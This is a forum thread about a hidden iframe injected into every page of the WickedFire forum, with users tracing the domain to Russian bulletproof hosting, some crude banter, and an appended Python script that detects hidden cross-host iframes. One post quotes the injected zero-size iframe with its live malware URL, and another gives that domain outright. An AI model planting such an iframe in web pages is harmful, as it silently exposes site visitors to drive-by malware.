Malware on WickedFire?

Status
Not open for further replies.


No.

But Firefox has that website on automatic block, so it won't access it without your consent.


I have AVG and am on FF as well so I don't see what you guys are talking about either. It requires an admin to fix anyways so I'm pretty useless here. :(
 
Well, if you want to see for yourself you can go to http://naemnitibo.in. Firefox will block the access and give you the option to enter it if you'd like.

If you take a look into the source code of every page on Wickedfire now, you'll see that an iframe has been imprinted, which loads naemnitibo.in. Maybe it is a bug that has been exploited. The forums over at DevShed have also been attacked by this fuck (see this thread).
 


If it's an iframe, Firefox has the warning shown within the iframe itself, as opposed to the parent frame.
 
Stanley took care of it. Thx for letting us know.

No problem, I'll take a 5 minute video of turbolapp walking on her turbostation as my reward.



From this angle please, thanks :)
 
^^Dude. That is so wrong.

My LCD screen is so much bigger than that.
 
Found it...
Code:
<iframe src="http://naemnitibo.in/cn.php?hyc" width="0" height="0"></iframe>
Here's the domain info for this stupid fuck. Obviously it's anonymous but I'm hoping Shady will show up soon and dig a little deeper than I can.

No matter which way you cut it, the trail goes dead somewhere in Russia. Impossible to verify who's real.
The place is a bulletproof hosting provider.
The only other trail I could see goes to the UK, but the name is "Oleg Orlov"...some human rights politician in Russia. So it's probably just them fucking around.
I could get a little deeper in, but honestly it's a pain in the ass since I can't just visit the URLs.
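A defender-side check for the injection described in this thread, as an added example that is not part of the original posts: it scans a page's HTML for iframes that are invisible (zero or one pixel, or hidden via style) and load from a host other than the site's own. The hostnames `forum.example`, `video.example` and `injected.example` and the sample page are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Width/height values that make a frame effectively invisible.
TINY = {"0", "1", "0px", "1px"}


class HiddenIframeFinder(HTMLParser):
    """Collect iframes that are invisible AND load from another host."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []  # (line number, remote host, raw src)

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "").strip() for k, v in attrs}
        src = a.get("src", "")
        # Handles absolute and protocol-relative URLs; relative paths have no host.
        host = (urlparse(src).hostname or "").lower()
        style = a.get("style", "").lower().replace(" ", "")
        hidden = (
            a.get("width", "").lower() in TINY
            or a.get("height", "").lower() in TINY
            or "display:none" in style
            or "visibility:hidden" in style
        )
        same_site = host == self.site_host or host.endswith("." + self.site_host)
        if hidden and host and not same_site:
            self.findings.append((self.getpos()[0], host, src))


def find_hidden_iframes(html, site_host):
    finder = HiddenIframeFinder(site_host)
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample page: two legitimate frames, two injected ones.
SAMPLE_PAGE = """<html><body>
<iframe src="/widgets/shoutbox.html" width="300" height="200"></iframe>
<iframe src="http://video.example/embed/1" width="560" height="315"></iframe>
<iframe src="http://injected.example/cn.php?x" width="0" height="0"></iframe>
<iframe src="//injected.example/a" style="display: none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for line, host, src in find_hidden_iframes(SAMPLE_PAGE, "forum.example"):
        print(f"line {line}: hidden iframe loading {host} ({src})")
```

Run against every template and cached page after a cleanup, since an injection like this one shows up on all pages that share the modified template.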
 